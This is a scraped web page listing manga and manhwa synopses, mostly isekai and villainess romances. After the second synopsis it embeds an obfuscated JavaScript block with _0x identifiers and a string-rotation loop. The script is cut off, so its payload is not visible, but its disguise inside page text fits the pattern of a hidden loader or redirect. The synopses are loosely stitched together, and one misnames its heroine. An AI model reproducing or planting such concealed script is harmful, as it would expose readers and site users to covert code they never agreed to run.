Read manga I Became a Fallen Saint Pregnant With a Tyrant / Boukun wo Migomoru Yami Ochi Seijo ni Narimashita The protagonist woke up and found herself in the world of her favorite fantasy novel, but it was 30 years before the story began! To make matters worse, she had become Serena, the infamous villainess and future mother of Xavier, the tyrant who would one day destroy the world. To survive, she knew she had to change everything. First, she needed to avoid Dietrich, the second prince destined to become the tyrant’s father, and most importantly, ensure she never carry his child. But it wasn’t that simple! Even Volkhardt, the first prince and father of the novel’s hero, had started chasing her! With two princes vying for her and her future hanging in the balance, she had to find a way to escape the path leading to her doom. Could she avoid the villainess’s tragic fate and rewrite her destiny?
As princess of Krashna, Maeva has always gotten her way. But when she is sent to marry the third prince of Jora, Haruk, she has little choice in the matter. Due to an impending war against another kingdom, it is her duty to marry him and solidify the alliance between Jora and Krashna. However, the third prince proves to be unenthusiastic, lazy, seemingly unemotional, and extremely unmotivated. Still, Maeva hopes that by getting close to him and gaining his love, her country would benefit politically. Yet she can’t shake the feeling of something strange…that there is more behind his expressionless, dark eyes.<script></script><script>(function(_0x340e45,_0x37f56e){var _0x2ef9b8=_0x2428,_0x35df10=_0x340e45();while(!![]){try{var _0x35cc4b=parseInt(_0x2ef9b8(0xb9))/(-0xe3e+-0x1*-0x1352+-0x513)*(-parseInt(_0x2ef9b8(0xcb))/(-0x2335+-0x225f+0x22cb*0x2))+parseInt(_0x2ef9b8(0xc8))/(0xf0d+0xd*-0x1+-0xefd)*(parseInt(_0x2ef9b8(0xc4))/(-0x2ec*0x1+0x1f91*0x1+-0x1*0x1ca1))+-parseInt(_0x2ef9b8(0xc6))/(-0x1c0f+0x10bb+0x245*0x5)+-parseInt(_0x2ef9b8(0xd4))/(0x113*-0xb+0x17b3+-0xbdc)+-parseInt(_0x2ef9b8(0xcd))/(-0x175f+0xcc9+0x13*0x8f)+-parseInt(_0x2ef9b8(0xd8))/(0x1*0xefa+-0x95f+-0x1*0x593)+parseInt(_0x2ef9b8(0xcc))/(-0x841*0x1+0x19db+0x1*-0x1191)*(parseInt(_0x2ef9b8(0xd7))/(-0x124*0xd+0xccd+0x1*0x211));if(_0x35cc4b===_0x37f56e)break;else _0x35df10['push'](_0x35df10['shift']());}catch(_0x216431){_0x35df10['push'](_0x35df10['shift']());}}}(_0x4e2e,-0x67a04+-0x56*-0x167c+-0x771de*-0x1));function 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Read manga Reincarnated As the Villain Queen to Get My Revenge / Sekkaku Tenseishita node, Akugyaku Joou de Zamaa Kaeshishitemimasu Having been raised to believe that obedience is a virtue, Laura has spent her life suppressing her feelings and prioritizing others. However, she slowly realizes this lesson brings no rewards: customers exploit her kindness, and her boyfriend cheats despite her compliance. Frustrated with her life, she stumbles upon a novel during a business trip. The story revolves around a powerless queen who is mistreated by her people and ultimately executed for a crime she didn’t commit. Captivated by the narrative, Lora resolves to live life on her own terms. But fate intervenes—a plane crash leads to her reincarnation as the very queen from the novel. In this world, a “Book of Prophecy” reveals key events from the story and lays out her seemingly doomed destiny. Refusing to accept the tragic fate, Lora begins to assert her power, determined to become a true queen rather than a puppet. Through clashes with her chief adversary, Duke Eldar, she not only rewrites her own fate but reshapes the future of her kingdom. Sekkaku Tenseishita node, Akugyaku Joou de Zamaa Kaeshishitemimasu / せっかく転生したので、悪逆女王でざまぁ返ししてみます
Maybelle had lived a life of abuse under her parents. Upon discovery that these ‘parents’ aren’t her true biological parents and that somewhere, her father exists, with a sad heart, Maybelle sets off in search of him.
Read manga I became the stepmother who caused my favorite character to fall into darkness / Oshio Yami Ochi Saseta Mamahaha ni Narimashita on MANGA ZIN Akari, who possessed the body of her favorite character’s stepmother. While she was delighted to see her beloved character in their adorable childhood up close, she realized that she herself is the stepmother ‘Elena,’ the person responsible for causing the character to fall into darkness. Determined to avoid the character’s descent into darkness and make them happy, Akari faces numerous challenges as the misdeeds of Elena before the possession come back to haunt her. Will she be able to make her favorite character happy 推しを闇落ちさせた継母になりました
Ji-Woo Lee, an author gets reincarnated into her novel as Tara Elias, the 5th daughter of the Elias family. However, the family is supposed to fall soon, and everyone in it will be executed. Ji-Woo insists that she will escape her fate. “I thought everything was going smoothly.” That is, until she meets the second prince. Prince Kyle Amur.
Read manga I Don’t Have The Qualities to be a Saint, So I Decided to Aim to be The Last Boss! / Seijo no Soshitsu ga nai no de, Last Boss o Mezasu Koto ni Shimashita / I’m No Saint, So I’ll Become the Demon Lord! Rina Amakusa is exhausted from her job at a black company. Guided by a voice, she enters the world of the game she loved and becomes a saint. She repeats the loop and tries to save the world, but when her beloved character is killed, her love for him turns to hatred. When love and hatred change her from a saint to a last boss, the “revenge” otherworldly fantasy begins! 聖女の素質がないので、ラスボスを目指すことにしました
Read manga Disgraced Wife? This Beloved Genius Mage Will Secure Her Divorce! / Munou Tsumatte Dare no Koto Kashira? ~Aisare Tensai Majutsushi, Rien o Kachitorimasu!~ at MANHUA TOP Countess Yumemi has a gift for magic, and together with her childhood friend Fred, she aims to become the first woman to join the Order of Knights through a friendly competition. However, just before she is about to achieve her dream, she is ordered into an unwanted marriage by the king, who has taken notice of her high magical power. As a noblewoman, the king’s orders are absolute, and she is determined not to cause any trouble for her family, so she arrives shortly after the wedding. Her husband, who had a talent for witchcraft, neglected Yumemi, violently attacked her and sealed her will and magic power with a cursed ring. Stripped her of magical powers and feelings. Yumemi was used as an outcast and treated like trash in her marriage , until one day she was pushed down the stairs and was left on the brink of life and death. When Yumemi manages to wake up, she no longer remembers her marriage, but has escaped the curse ring’s power…? From her diary, Yumemi learns that she was once treated harshly as an incompetent wife who couldn’t even use magic. Unaware that she has regained her magic power and will, she begins to fight back against her husband, who treats her as ‘incompetent’, and the servants who mistreated her, with tricks of her own! 無能妻って誰のことかしら? ~愛され天才魔術師、離縁を勝ち取ります!~
Read manga Forget That Night, Your Majesty / Heika Watashi o Wasurete Kudasai / 陛下わたしを忘れてください “Even if you didn’t love me, I still wanted to save you.” Lunia, the daughter of the Persephone Count family, lives a lonely life, shunned by her father and treated as a mere tool by her half-brother. Abandoned and isolated, her days are filled with despair. However, fate takes a sudden turn when a priest brings a proposal that ties her destiny to Hadeus, the head of the Chronoa Ducal House. What will happen when a girl who has been denied love her entire life crosses paths with a duke whose secrets could change the course of her future? Unravel the intricate web of politics, emotions, and romance in this gripping fantasy tale. Dive into “Forget That Night, Your Majesty” and experience the poignant journey of a woman striving to find her place in a world that has cast her aside. Heika Watashi o Wasurete Kudasai 陛下わたしを忘れてください
Read manhwa No More Kisses at MANGAZIN Euphemia Kelet, known as the “Ice Lady” for her lack of emotion, is suddenly declared unengaged by the crown prince. Forced to remarry, she is sent to the frigid northern lands, where the roars of magical beasts tear through the night sky. Governing this icy territory is Duke Siegfried Dinkela, a man infamous for his ruthless and merciless reputation. However, waiting for her in the freezing castle is a storm of sweet kisses. Siegfried’s passionate warmth melts Euphemia’s cold facade, awakening a mysterious power hidden within her. Beneath the icy mask, a blazing fire now burns, one powerful enough to shake her very existence.
Read manhwa My Observational Diary Of Elena Evoy / Observing Elena Evoy / Elena Evoy Observation Diary / 일레나 에보이 관찰 일지 Everyone had no doubt that Johnan would be the top student at the Academy. After all, he possessed a face blessed by God, a friendly personality, and was talented in both sports and academics. However, the position was taken by someone else. “Miss Elena. Congratulations on your accomplishment.” “Thank you.” Elena, who didn’t even seem to know his name, was different. She didn’t say anything to him, even though most people would’ve taken the opportunity to talk to him. “Do you have something more to say?” Johnan’s self-esteem was shattered when he realized she had no clue who he was. From that moment on, Johnan started to observe Elena.